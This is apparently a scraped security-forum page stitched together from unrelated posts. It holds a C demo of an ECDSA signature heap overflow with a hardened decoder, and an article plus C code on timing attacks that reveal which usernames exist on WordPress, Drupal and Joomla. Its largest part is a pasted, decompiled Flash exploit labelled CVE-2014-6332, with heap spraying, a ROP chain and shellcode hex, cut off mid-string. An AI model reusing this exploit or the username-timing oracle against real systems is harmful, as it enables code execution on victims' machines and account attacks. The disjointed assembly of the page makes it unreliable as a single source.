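The decode path the article walks through, written out as an added example (not the author's code and not anything lifted from schannel): a small DER parser for SEQUENCE { INTEGER r, INTEGER s }, the destination size derived from the key length (bits/8, doubled), the overflow arithmetic the two trusting memcpys imply, and a hardened decode-and-reverse that bounds each integer by one field element before copying. The signature bytes are constructed filler, not real ECDSA output; the long-form DER length handling and the big-endian-to-little-endian "reverse" step are my assumptions for the example, not observations from the binary.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Decoded DER ECDSA-Sig-Value: a length and a pointer per integer, the same
 * shape as the 12-byte ECC_SIGNATURE header the post describes. */
typedef struct {
    const uint8_t *r; size_t r_len;
    const uint8_t *s; size_t s_len;
} ecc_sig_t;

/* Read a DER length (short form, or long form 0x81/0x82). Returns the number
 * of length bytes consumed, 0 if malformed or unsupported (e.g. indefinite). */
static size_t der_read_len(const uint8_t *p, size_t avail, size_t *len) {
    if (avail < 1) return 0;
    if (p[0] < 0x80) { *len = p[0]; return 1; }
    size_t n = p[0] & 0x7f;
    if (n == 0 || n > 2 || avail < 1 + n) return 0;
    *len = 0;
    for (size_t i = 0; i < n; i++) *len = (*len << 8) | p[1 + i];
    return 1 + n;
}

/* Read one TLV whose tag must be `tag`; fills val/len, returns total bytes consumed, 0 on error. */
static size_t der_read_tlv(const uint8_t *p, size_t avail, uint8_t tag,
                           const uint8_t **val, size_t *len) {
    if (avail < 2 || p[0] != tag) return 0;
    size_t hdr = der_read_len(p + 1, avail - 1, len);
    if (hdr == 0 || 1 + hdr + *len > avail) return 0;
    *val = p + 1 + hdr;
    return 1 + hdr + *len;
}

/* Decode SEQUENCE { INTEGER r, INTEGER s }. 0 on success, -1 if malformed. Like the
 * CryptDecodeObject step in the post, decoding itself is safe: it only reports sizes. */
int decode_ecdsa_sig(const uint8_t *der, size_t der_len, ecc_sig_t *out) {
    const uint8_t *seq; size_t seq_len, used, used2;
    if (der_read_tlv(der, der_len, 0x30, &seq, &seq_len) != der_len) return -1;
    used = der_read_tlv(seq, seq_len, 0x02, &out->r, &out->r_len);
    if (used == 0) return -1;
    used2 = der_read_tlv(seq + used, seq_len - used, 0x02, &out->s, &out->s_len);
    if (used2 == 0 || used + used2 != seq_len) return -1;
    return 0;
}

/* Destination size derived from KeyLength exactly as the post describes. */
size_t expected_sig_bytes(unsigned key_bits) { return (key_bits / 8) * 2; }

/* The bug as arithmetic instead of a live memcpy: both copies trust r_len and s_len,
 * so this is how many bytes the second memcpy would write past the heap buffer (0 = fits). */
size_t overflow_bytes(const ecc_sig_t *sig, unsigned key_bits) {
    size_t need = sig->r_len + sig->s_len, have = expected_sig_bytes(key_bits);
    return need > have ? need - have : 0;
}

/* Hardened decode-and-reverse: reject any INTEGER longer than one field element, then
 * emit r||s with each integer byte-reversed (assumption: big-endian DER to little-endian
 * for CNG) and left-padded. Returns bytes written, 0 if rejected. */
size_t safe_decode_and_reverse(const uint8_t *der, size_t der_len, unsigned key_bits,
                               uint8_t *dst, size_t dst_len) {
    ecc_sig_t sig; size_t field = key_bits / 8;
    if (decode_ecdsa_sig(der, der_len, &sig) != 0) return 0;
    if (sig.r_len > field || sig.s_len > field || dst_len < 2 * field) return 0;
    memset(dst, 0, 2 * field);
    for (size_t i = 0; i < sig.r_len; i++) dst[i] = sig.r[sig.r_len - 1 - i];
    for (size_t i = 0; i < sig.s_len; i++) dst[field + i] = sig.s[sig.s_len - 1 - i];
    return 2 * field;
}

/* --- constructed inputs for the demo: r and s are filler bytes, not real values --- */
static size_t put_len(uint8_t *p, size_t len) {
    if (len < 0x80)  { p[0] = (uint8_t)len; return 1; }
    if (len < 0x100) { p[0] = 0x81; p[1] = (uint8_t)len; return 2; }
    p[0] = 0x82; p[1] = (uint8_t)(len >> 8); p[2] = (uint8_t)len; return 3;
}
size_t build_sig(uint8_t *buf, size_t cap, size_t r_len, size_t s_len) {
    uint8_t body[512]; size_t n = 0, k = 0;
    if (r_len > 200 || s_len > 200 || cap < 512) return 0;
    body[n++] = 0x02; n += put_len(body + n, r_len); memset(body + n, 0x11, r_len); n += r_len;
    body[n++] = 0x02; n += put_len(body + n, s_len); memset(body + n, 0x22, s_len); n += s_len;
    buf[k++] = 0x30; k += put_len(buf + k, n); memcpy(buf + k, body, n);
    return k + n;
}
/* Overflow the vulnerable path would suffer for a constructed signature of these sizes. */
size_t overflow_for(size_t r_len, size_t s_len, unsigned key_bits) {
    uint8_t der[512]; ecc_sig_t sig;
    size_t n = build_sig(der, sizeof der, r_len, s_len);
    if (n == 0 || decode_ecdsa_sig(der, n, &sig) != 0) return (size_t)-1;
    return overflow_bytes(&sig, key_bits);
}
/* Bytes the hardened path writes for the same input (0 = rejected). */
size_t safe_for(size_t r_len, size_t s_len, unsigned key_bits) {
    uint8_t der[512], out[128];
    size_t n = build_sig(der, sizeof der, r_len, s_len);
    return n ? safe_decode_and_reverse(der, n, key_bits, out, sizeof out) : 0;
}

int main(void) {
    printf("P-256, 32+32 byte sig : overflow %zu, hardened wrote %zu\n", overflow_for(32, 32, 256), safe_for(32, 32, 256));
    printf("P-256, 32+100 byte sig: overflow %zu, hardened wrote %zu\n", overflow_for(32, 100, 256), safe_for(32, 100, 256));
    return 0;
}
```

The point of the two `_for` helpers is the comparison the article makes in prose: with a 256-bit key the buffer is 64 bytes, a 32+32 signature fits, and every byte of S beyond that lands on the following heap chunk, while the hardened path refuses the same input before any copy happens.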
  16. Nothing but crap posts. One more and you get a permanent ban.
  17. Timing Attacks in Web Applications

When code is executed by a machine it takes some time to do so. Execution time ranges from nanoseconds to months and years and even more (think bruteforcing). Web applications construct output producing, in most cases, very short delays (think the time it takes to show Google search results after typing in the query). Depending on what output is requested, how it is requested and what the input is, web applications can vary their execution time. In this article we're going to exploit some of the open-source content management systems available, using delays in their execution under differing conditions to evoke distinct differences in execution time, which allow us, as attackers, to draw some useful conclusions.

WordPress

You should know what WordPress is. It's only the most popular content management system at the moment, and the slickest one, too. wp-includes/user.php is the code that we shall be attempting to exploit. This code handles user authentication in WordPress. Take your time to go through the function code. You can immediately see early return conditions. When the username is not found an error is returned. If a username exists, the password is hashed and checked against the valid password hash for the user. So, hashing the input password is work that does not happen if a username does not exist. And hashing is an expensive operation relative to everything else, so potentially a difference in time should be noticeable. Armed with cURL we do:

time curl --data "log=noexist&pwd=asdf&wp-submit=Log In" http://wordpress.lo/wp-login.php --silent > /dev/null

real 0m0.599s
user 0m0.012s
sys 0m0.000s

time curl --data "log=admin&pwd=asdf&wp-submit=Log In" http://wordpress.lo/wp-login.php --silent > /dev/null

real 0m0.566s
user 0m0.000s
sys 0m0.012s

Having done this a couple of times you'll notice no difference. Due to fluctuating network latency and other factors the results are in no way conclusive.

So let's prepare a larger password to hash to make WordPress huff and puff a bit.

echo -n "log=noexist&pwd=" > payload && printf "%s" {1..100000} >> payload && echo -n "&wp-submit=Log In" >> payload

~500 kilos worth of password characters to hash, eek.

time curl --data @payload http://wordpress.lo/wp-login.php --silent > /dev/null

real 0m0.511s
user 0m0.012s
sys 0m0.032s

echo -n "log=admin&pwd=" > payload && printf "%s" {1..100000} >> payload && echo -n "&wp-submit=Log In" >> payload

time curl --data @payload http://wordpress.lo/wp-login.php --silent > /dev/null

real 0m29.803s
user 0m0.012s
sys 0m0.036s

See? This is, of course, very far from useful in the context of WordPress, since WordPress is kind enough to give out different error messages depending on whether a user exists or not.

ERROR: The password you entered for the username admin is incorrect.

vs.

ERROR: Invalid username.

The same cannot be said for other applications.

Drupal

Authentication in Drupal is handled by the user module, found in modules/user/user.module. Take a peek at the user_login_authenticate_validate function. See the branch that allows some extra work?

if ($account) { ....

The principle is the same. However, even short passwords make Drupal work noticeably hard.

time curl --data "name=noexist&pass=123&op=Log in&form_id=user_login" http://sandbox.lo/drupal-7.12/?q=user --silent > /dev/null

real 0m0.593s
user 0m0.012s
sys 0m0.028s

time curl --data "name=admin&pass=not_real&op=Log in&form_id=user_login" http://sandbox.lo/drupal-7.12/?q=user --silent > /dev/null

real 0m1.181s
user 0m0.012s
sys 0m0.028s

So no need to assemble large payloads. Thanks, Drupal.

Joomla!

The more convoluted Joomla authentication routine is stowed away in plugins/authentication/joomla/joomla.php, onUserAuthenticate. Take a moment to look at it. The scenario is completely the same:

if ($result) { ...

does extra work if the user exists, and

$testcrypt = JUserHelper::getCryptedPassword($credentials['password'], $salt);

will do some work if the user exists, theoretically. The difficulty here is that by default Joomla uses md5 hashing, which is relatively lightweight and very fast. Joomla doesn't really mind hashing 10MB password payloads and is not susceptible to such attacks in md5 mode. Yet, once it's in any of the other available hashing modes, timing attacks to check username validity are possible.

Conclusion

Do you know of any other popular web applications that are predisposed to any form of timing attacks?

Source: Timing Attacks in Web Applications
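The measurement the article makes with single `time curl` runs, redone as an added example (not the article's own code, and not WordPress, Drupal or Joomla code): a toy login with the same early-return shape, a username oracle that compares medians over repeated samples instead of eyeballing one run, and a hardened login that hashes unconditionally. The single-user store, the stand-in slow hash and the long password are all constructed for the example; it runs in-process, so the network jitter the author mentions is out of the picture, but against a real target the same median comparison over repeated requests is what replaces a single `time curl`.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

/* Cost knob for the stand-in hash: work is ROUNDS * strlen(password), so a long
 * password is expensive (the post's payload trick) and a short one nearly free. */
#define ROUNDS 2000u
#define LONG_PW_LEN 4096

/* Stand-in for phpass/pbkdf2: repeated FNV-1a mixing. Only its cost matters here. */
uint32_t slow_hash(const char *pw, size_t len) {
    uint32_t h = 2166136261u;
    for (unsigned r = 0; r < ROUNDS; r++)
        for (size_t i = 0; i < len; i++) { h ^= (uint8_t)pw[i]; h *= 16777619u; }
    return h;
}

/* Constructed single-user store (assumption: user "admin", password "correct horse"). */
static const char *STORED_USER = "admin";
static uint32_t stored_hash(void) {
    static uint32_t h; static int ready;
    if (!ready) { h = slow_hash("correct horse", 13); ready = 1; }
    return h;
}

/* Leaky login, the shape the post finds in all three CMSes: unknown user returns before hashing. */
int login_leaky(const char *user, const char *pw) {
    if (strcmp(user, STORED_USER) != 0) return 0;
    return slow_hash(pw, strlen(pw)) == stored_hash();
}

/* Hardened login: always pay for the hash, fold user existence into the result afterwards. */
int login_hardened(const char *user, const char *pw) {
    int exists = strcmp(user, STORED_USER) == 0;
    int match = slow_hash(pw, strlen(pw)) == stored_hash();
    return exists & match;
}

/* The post's ~500 KB payload idea, shrunk to LONG_PW_LEN 'A's. */
const char *long_password(void) {
    static char pw[LONG_PW_LEN + 1];
    if (pw[0] == 0) { memset(pw, 'A', LONG_PW_LEN); pw[LONG_PW_LEN] = 0; }
    return pw;
}

static double now_s(void) {
    struct timespec ts; clock_gettime(CLOCK_MONOTONIC, &ts);
    return (double)ts.tv_sec + ts.tv_nsec / 1e9;
}
static int cmp_double(const void *a, const void *b) {
    double x = *(const double *)a, y = *(const double *)b; return (x > y) - (x < y);
}

/* Median of `samples` wall-clock measurements; the median shrugs off the jitter that
 * made the post's single curl runs inconclusive. */
double median_time(int (*login)(const char *, const char *),
                   const char *user, const char *pw, int samples) {
    double t[64];
    if (samples > 64) samples = 64;
    if (samples < 1) samples = 1;
    for (int i = 0; i < samples; i++) {
        double t0 = now_s();
        volatile int r = login(user, pw); (void)r;
        t[i] = now_s() - t0;
    }
    qsort(t, (size_t)samples, sizeof t[0], cmp_double);
    return t[samples / 2];
}

/* Username oracle: time `user` against a name that certainly does not exist. Flag it as
 * existing only if it is both `ratio` times slower AND at least `min_gap_s` slower, so
 * nanosecond noise between two fast paths never trips the check. */
int username_exists_by_timing(int (*login)(const char *, const char *),
                              const char *user, const char *pw,
                              int samples, double ratio, double min_gap_s) {
    double base = median_time(login, "no-such-user-zz", pw, samples);
    double tgt  = median_time(login, user, pw, samples);
    return tgt > base * ratio && tgt - base > min_gap_s;
}

int main(void) {
    const char *pw = long_password();
    printf("leaky    admin  exists? %d\n", username_exists_by_timing(login_leaky, "admin", pw, 15, 1.5, 1e-4));
    printf("leaky    nobody exists? %d\n", username_exists_by_timing(login_leaky, "nobody", pw, 15, 1.5, 1e-4));
    printf("hardened admin  exists? %d\n", username_exists_by_timing(login_hardened, "admin", pw, 15, 1.5, 1e-4));
    return 0;
}
```

Two design points carry over to real targets: use a median (or a low percentile) rather than a single sample, and require an absolute gap as well as a ratio, otherwise two equally fast code paths will produce spurious "exists" verdicts from noise alone.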
  18. [h=1]Exploit.SWF.CVE-2014-6332[/h]By: physicaldrive0 on Nov 21st, 2014 *** PhysicalDrive0 *** package mx.core { public namespace mx_internal = "http://www.adobe.com/2006/flex/mx/internal"; }//package mx.core ?package mx.core { public interface IFlexAsset { } }//package mx.core ?package mx.core { import flash.utils.*; public class ByteArrayAsset extends ByteArray implements IFlexAsset { mx_internal static const VERSION:String = "4.6.0.23201"; } }//package mx.core ?package { import mx.core.*; public class flappyMan_keyClass extends ByteArrayAsset { } }//package ?package { import flash.events.*; import flash.utils.*; import flash.display.*; import flash.media.*; import __AS3__.vec.*; import flash.net.*; import flash.external.*; public class flappyMan extends MovieClip { public var keyClass:Class; private var btaObj:ByteArray; private var outObj:theoutobj; private var sndObj:Sound; public var vtObj20W:Vector.<Object>; public var vtObj1H:Vector.<Object>; public var vtObj20WLen:int = 1022; public var vtObj1HLen:int = 1007; private var workTimerExploit:Timer; private var bGoNextStep:Boolean = false; private var bExploited:Boolean = false; private var infectedObjIndex:int = 0; private var changedPropertyObjIndex:int = 0; private var iLoopCount:int = 0; private var controlledAddr:uint = 0; private var heapSprayObjAddr:uint = 0x1E140000; private var fakeEnvcoreObjAddr:uint; private var offset:int = 0; private var iCountOffset:int = 184; private var stackMemoryStructAddr:int = 0; private var flagNumber:uint = 3735928545; private var flagSavePosition:int = 176; private var ropChainLen:int = 0; private var uiNopValue:uint = 0; private var recObjAddr:uint = 0; private var _MaxCountPos:uint = 0; private var heapSprayLenByEnv20W:int = 98688; private var storedObjIndex:int = 0; public var fModuleAddrStart:int = 0; public var fModuleAddrEnd:int = 0; private var code:String = ""; private var stopCode:String = ""; private var jpgBytes:ByteArray; private var jpgLoader:URLLoader; 
private var floatString:String = ""; public function flappyMan(){ this.keyClass = flappyMan_keyClass; this.fakeEnvcoreObjAddr = (this.heapSprayObjAddr + 0x0100); this.stackMemoryStructAddr = (this.heapSprayObjAddr + 32); this.btaObj = new ByteArray(); this.outObj = new theoutobj(); this.sndObj = new Sound(); this.vtObj20W = new Vector.<Object>(this.heapSprayLenByEnv20W); this.vtObj1H = new Vector.<Object>(256); var _local1:Number = 500; var _local2:int = (17 * 2); this.workTimerExploit = new Timer((_local1 / 2), _local2); super(); var _local3:* = new URLRequest(); this.jpgBytes = new ByteArray(); this.jpgLoader = new URLLoader(); _local3.url = "shadow.jpg"; this.jpgLoader.dataFormat = URLLoaderDataFormat.BINARY; this.jpgLoader.addEventListener(Event.COMPLETE, this.func_prepare); this.jpgLoader.load(_local3); } private function evalCode(_arg1:uint):void{ if (ExternalInterface.available){ ExternalInterface.call("Beginx", ""); }; } private function checkEvnExploitable():Boolean{ return (true); } private function checksharobject():Boolean{ var _local2:Number; var _local1:SharedObject = SharedObject.getLocal("flashplayerinUSA"); if (_local1.size == 0){ _local1.close(); return (false); }; _local2 = (new Date().time - _local1.data.now); if (_local2 < ((((1 * 24) * 60) * 60) * 1000)){ _local1.close(); return (true); }; _local1.close(); return (false); } private function setsharobject():Boolean{ var _local1:SharedObject = SharedObject.getLocal("flashplayerinUSA"); if (_local1.size == 0){ _local1.data.now = new Date().time; _local1.flush(); _local1.close(); return (true); }; return (false); } public function func_prepare(_arg1:Event):void{ var _local2:int; var _local3:int; var _local4:int; if (((!(this.checkEvnExploitable())) || (this.checksharobject()))){ return; }; _local2 = 0; while (_local2 < this.heapSprayLenByEnv20W) { this.vtObj20W[_local2] = new Vector.<uint>(this.vtObj20WLen); this.vtObj20W[_local2][(this.vtObj20WLen - 2)] = 1; _local2++; }; _local2 = 0; while 
(_local2 < 0x0100) { this.vtObj1H[_local2] = new Vector.<Object>(this.vtObj1HLen); _local3 = 0; while (_local3 < this.vtObj1HLen) { this.vtObj1H[_local2][_local3] = this.sndObj; _local3++; }; _local2++; }; this.evalCode(0); this.workTimerExploit.start(); this.workTimerExploit.addEventListener(TimerEvent.TIMER, this.func_step2); } public function func_step2(_arg1:Event):void{ if (this.bExploited == true){ this.workTimerExploit.stop(); return; }; var _local2:int; while (_local2 < this.heapSprayLenByEnv20W) { try { if ((this.vtObj20W[_local2] as Vector.<uint>).length > this.vtObj20WLen){ this.bExploited = true; break; }; } catch(e:Error) { }; _local2++; }; if (!this.bExploited){ return; }; this.workTimerExploit.stop(); this.changedPropertyObjIndex = _local2; this.storedObjIndex = this.changedPropertyObjIndex; _local2 = 0; this.uiNopValue = this.vtObj20W[this.changedPropertyObjIndex][((0x1000 / 4) - 2)]; if (this.uiNopValue != this.vtObj20WLen){ this._MaxCountPos = (((this.vtObj20W[this.storedObjIndex].length - (0x1000 / 4)) - 2) / (0x1000 / 4)); _local2 = 0; while (_local2 < this._MaxCountPos) { this.uiNopValue = this.vtObj20W[this.changedPropertyObjIndex][(((0x1000 / 4) - 2) + ((0x1000 / 4) * _local2))]; if (this.uiNopValue == this.vtObj20WLen){ break; }; _local2++; }; if (_local2 == this._MaxCountPos){ this.bExploited = true; return; }; }; this.recObjAddr = this.vtObj20W[this.changedPropertyObjIndex][(((0x1000 / 4) - 1) + ((0x1000 / 4) * _local2))]; this.vtObj20W[this.changedPropertyObjIndex][(((0x1000 / 4) - 2) + ((0x1000 / 4) * _local2))] = 1073741823; if (this.checkProperty() == false){ return; }; this.controlledAddr = ((this.heapSprayObjAddr + (0x1000 * (_local2 + 1))) + 8); var _local3:uint; var _local4:uint = (this.controlledAddr + ((this.heapSprayLenByEnv20W - this.changedPropertyObjIndex) * 0x1000)); _local2 = ((this.controlledAddr & 0xFFFFF000) + 0x1000); while (_local2 < _local4) { if (((((((((((((!((this.readUnsignedInt((_local2 + (4 * 4))) == 0))) && 
(!((this.readUnsignedInt((_local2 + (6 * 4))) == 0))))) && ((this.readUnsignedInt((_local2 + (7 * 4))) == 0)))) && ((this.readUnsignedInt((_local2 + (8 * 4))) == 0)))) && ((this.readUnsignedInt((_local2 + (12 * 4))) == 0)))) && ((this.readUnsignedInt((_local2 + (13 * 4))) == 0)))) && ((this.readUnsignedInt((_local2 + (15 * 4))) == 2)))){ _local3 = _local2; break; }; _local2 = (_local2 + 0x1000); }; if (!_local3){ return (this.safe_exit()); }; var _local5:int = _local3; while (1) { if (_local5 < 65536){ return (this.safe_exit()); }; if (this.readUnsignedInt((_local5 + 16)) < 5){ break; }; _local5 = this.readUnsignedInt((16 + _local5)); }; var _local6:int; var _local7:int; while (_local6 < 100) { if ((((((this.readUnsignedInt(((_local5 + 80) + (_local6 * 40))) > 0x10000000)) && ((this.readUnsignedInt(((_local5 + 76) + (_local6 * 40))) == 0)))) && ((this.readUnsignedInt(((_local5 + 84) + (_local6 * 40))) == 0)))){ _local7 = this.readUnsignedInt(((_local5 + 80) + (_local6 * 40))); if ((((((((this.readUnsignedInt((_local7 + 4)) == 1007)) && ((this.readUnsignedInt((_local7 + 16)) == this.readUnsignedInt((_local7 + 64)))))) && ((this.readUnsignedInt((_local7 + 28)) == this.readUnsignedInt((_local7 + 44)))))) && (this.readUnsignedInt((_local7 + 28))))){ break; }; }; _local6++; }; if (_local6 == 100){ return (this.safe_exit()); }; _local7 = this.readUnsignedInt((_local7 + 28)); _local7 = (_local7 & 0xFFFFFFFC); var _local8:uint = this.readUnsignedInt(_local7); _local8 = (_local8 & 0xFFFF0000); while (1) { if ((this.readUnsignedInt(_local8) % 65536) == 23117){ break; }; _local8 = (_local8 - 65536); }; var _local9:uint = _local8; _local8 = this.readUnsignedInt((_local9 + 60)); _local8 = this.readUnsignedInt(((_local9 + _local8) + 128)); _local8 = (_local9 + _local8); var _local10:int = _local8; var _local11:int; var _local12:int; _local6 = 0; while (_local6 < 20) { _local8 = (_local9 + this.readUnsignedInt(((_local10 + (_local6 * 20)) + 12))); if 
((this.readUnsignedInt(_local8) ^ 0x20202020) == 1852990827){ _local12 = (_local9 + this.readUnsignedInt((_local10 + (_local6 * 20)))); _local11 = (_local9 + this.readUnsignedInt(((_local10 + (_local6 * 20)) + 16))); break; }; _local6++; }; if (_local6 == 20){ return (this.safe_exit()); }; var _local13:uint; var _local14:uint; var _local15:uint; var _local16:uint; var _local17:int; _local6 = 0; while ((((_local6 < 1367)) && ((_local17 < 2)))) { _local8 = (_local9 + this.readUnsignedInt((_local12 + (_local6 * 4)))); if ((((_local8 == _local9)) || ((_local8 > (_local9 + 0xFFFFFF))))){ break; }; if (((!(_local13)) && ((((((this.readUnsignedInt((_local8 + 2)) == 1953655126)) && ((this.readUnsignedInt((_local8 + 6)) == 1097621877)))) && ((this.readUnsignedInt((_local8 + 10)) == 1668246636)))))){ _local14 = (_local11 + (_local6 * 4)); _local13 = this.readUnsignedInt(_local14); _local17++; } else { if (((!(_local15)) && ((((((this.readUnsignedInt((_local8 + 2)) == 1349805383)) && ((this.readUnsignedInt((_local8 + 6)) == 1097035634)))) && ((this.readUnsignedInt((_local8 + 10)) == 1701995620)))))){ _local16 = (_local11 + (_local6 * 4)); _local15 = this.readUnsignedInt(_local16); _local17++; }; }; _local6++; }; if (_local6 == 1367){ return (this.safe_exit()); }; this.fModuleAddrStart = this.readUnsignedInt((_local9 + 60)); this.fModuleAddrEnd = this.readUnsignedInt(((_local9 + this.fModuleAddrStart) + 264)); this.fModuleAddrStart = this.readUnsignedInt(((_local9 + this.fModuleAddrStart) + 260)); this.fModuleAddrStart = (_local9 + this.fModuleAddrStart); this.fModuleAddrEnd = (_local9 + this.fModuleAddrEnd); _local6 = this.fModuleAddrStart; this.writeUnsignedInt((this.stackMemoryStructAddr - 8), this.fModuleAddrStart); this.writeUnsignedInt((this.stackMemoryStructAddr - 4), this.fModuleAddrEnd); var _local18:int; _local6 = this.fModuleAddrStart; while (_local6 < this.fModuleAddrEnd) { if ((((((this.readUnsignedInt(_local6) == _local14)) && (((this.readUnsignedInt((_local6 - 
2)) & 0xFFFF) == 5631)))) && (((this.readUnsignedInt((_local6 + 4)) & 0xFF) == 195)))){ _local18 = (_local6 - 2); break; }; _local6++; }; var _local19:uint; var _local20:uint; var _local21:uint; var _local22:uint; var _local23:uint; var _local24:uint; var _local25:uint; var _local26:uint; _local6 = (this.fModuleAddrStart + 0x1000); _local17 = 0; while ((((_local6 < (this.fModuleAddrEnd - 4))) && ((_local17 < 4)))) { _local21 = this.readUnsignedInt(_local6); if (((!(_local26)) && (((_local21 & 0xFFFF) == 50068)))){ _local26 = _local6; _local17++; }; if (((!(_local25)) && (((_local21 & 0xFFFF) == 50070)))){ _local25 = _local6; _local17++; }; if (((!(_local23)) && (((_local21 & 0xFFFF) == 50008)))){ _local23 = _local6; _local17++; }; if (((!(_local24)) && (((_local21 & 0xFFFF) == 8447)))){ _local24 = _local6; _local17++; }; _local6++; }; if ((((((((((((((_local13 == 0)) || ((_local25 == 0)))) || ((_local24 == 0)))) || ((_local23 == 0)))) || ((_local18 == 0)))) || ((_local15 == 0)))) || ((_local26 == 0)))){ return (this.safe_exit()); }; var _local27:int = (_local25 + 1); var _local28:int = (this.heapSprayObjAddr + 65792); var _local29 = (_local28 & 0xFFFFF000); var _local30:ByteArray = new ByteArray(); _local30.endian = Endian.LITTLE_ENDIAN; _local6 = 0; while (_local6 < 0x0100) { var _temp1 = _local6; _local6 = (_local6 + 1); _local30.writeUnsignedInt(this.readUnsignedInt((_local29 + (4 * _temp1)))); }; var _local31:ByteArray = new ByteArray(); _local31.endian = Endian.LITTLE_ENDIAN; _local6 = 0; while (_local6 < 262144) { var _temp2 = _local6; _local6 = (_local6 + 1); _local31.writeUnsignedInt(this.readUnsignedInt((_local28 + (4 * _temp2)))); }; var _local32 = 96; var _local33 = 32; var _local34:int; var _local35:uint = ((_local28 + _local32) + _local33); var _temp3 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local29 + (4 * _temp3)), _local35); _local34 = 0; var _temp4 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * 
_temp4)), _local27); var _temp5 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp5)), _local25); var _temp6 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp6)), _local23); var _temp7 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp7)), _local28); var _temp8 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp8)), _local18); var _temp9 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp9)), _local29); var _temp10 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp10)), 65536); var _temp11 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp11)), 0x1000); var _temp12 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp12)), 64); var _temp13 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp13)), (_local18 + 6)); var _temp14 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp14)), (_local18 + 6)); var _temp15 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp15)), (_local18 + 6)); var _temp16 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp16)), _local24); var _temp17 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp17)), _local24); this.ropChainLen = (_local34 * 4); while (_local34 < (_local32 / 4)) { var _temp18 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp18)), (_local28 + _local32)); }; while (_local34 < ((_local32 + _local33) / 4)) { var _temp19 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp19)), _local26); }; this.ropChainLen = _local34; var _temp20 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp20)), 2425415307); var _temp21 = 
_local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp21)), 0x90909090); var _temp22 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp22)), 3096481936); var _temp23 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp23)), (this.heapSprayObjAddr + 8)); var _temp24 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp24)), 3146813584); var _temp25 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp25)), _local15); var _temp26 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp26)), 2425362569); var _temp27 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp27)), 3096481936); var _temp28 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp28)), (_local35 + (((_local34 - this.ropChainLen) + 1) * 4))); var _temp29 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp29)), 2428752127); var _local36 = 
"81ec8b550003ccec57565300fc6085c70000ffff85c70000fffffc3800000000fd1885c70000ffff85c70000fffffc7000000000fc4485c70001ffff85c70000fffffce400000000fcd885c70000ffff85c70000fffffc3c00000000fd0c85c70000ffff45c70000000000fcf485c70000fffffcc7000000fffc4c85000000ff0085c70000fffffd33000000858966c0fffffc648966c933fffd108ddc85c7ff00fffffcc7000000fffd0485000000fff885c70000fffffcc7000000fffc5085000000ff0885c70000fffffdc7000000fffc5885000000ff5c85c70000fffffcc7000000fffc4885000000ff6885c70000fffffcc7000000fffd2485000000ff4085c70000fffffcc7000000fffc5485000000fffc85c70000fffffcc7000000fffc7485000000ff7885c70000fffffcc7000000fffc7c85000000ffe885c70045fffffcc754454dfffcec854c442efff085c74c00fffffcc7000000fffd1c85000000ff2085c70000fffffdc7000000fffce085000000ff6c85c70000fffffcc7000000fffc8085917432ff8485c70c85fffffcc7bbafdffffc8885de5967ff8c85c71e05fffffcc76144aafffc90853d8815ff9485c76c58fffffcc797410ffffc9885e2f2b2ff9c85c7f4a0fffffcc7cb9765fffca08564a41effa485c7efbbfffffcc72729f8fffca885ae9074ffac85c78093fffffcc794e432fffcb0851f8dc4ffb485c77457fffffcc7ff0d66fffcb885a22f51ffbc85c70139fffffcc7837de2fffcc08507d145ffc485c74863fffffcc74fd189fffcc88517053dffcc85c78ed7fffffcc7818f6efffcd08544d772ffd485c78072fffffce88644d700000000f0002558002dffff89000100fffc488589008bfffffc588530a164ff8b00000085890c40fffffd148b1c408bdc8b0840fc488d8bec83ffff2404c7206553744e042444c76e6f4374082444c7747865740c2444c765726854102444c70000646151ff50548de38b08fffc808d544189ff28bd8d5733fffffdccb966c9f3c0330285c75faafffffd2800010010fd28958d6a52ffffd495fffe89fffffcfffd088508bd83ff00fffffd41e905748b000003fffc9085508589ff8dfffffcfffc8085f88b60ffa164c933000000308b0c408b688b1c4020588b084b38008bb1f375180c4b383332b1ec75750e4b38382eb1e5de75104bf78bed8be859126a0000001fee8bf9e26e686c6a546c6474c48316ff6ae88b0804e85903e20000005145ebf93c758b56782e748b8b56f503f50320764149c93333c503ad10be0fdb0874d63a0307cbc1f1eb40dae7751f3b245e8b5e8b66dd035e8b4b0c8bdd031cc5038b04c3595eab508d8b613bfffffcfffc908de90575ff00000278000000e885895800fffffc5
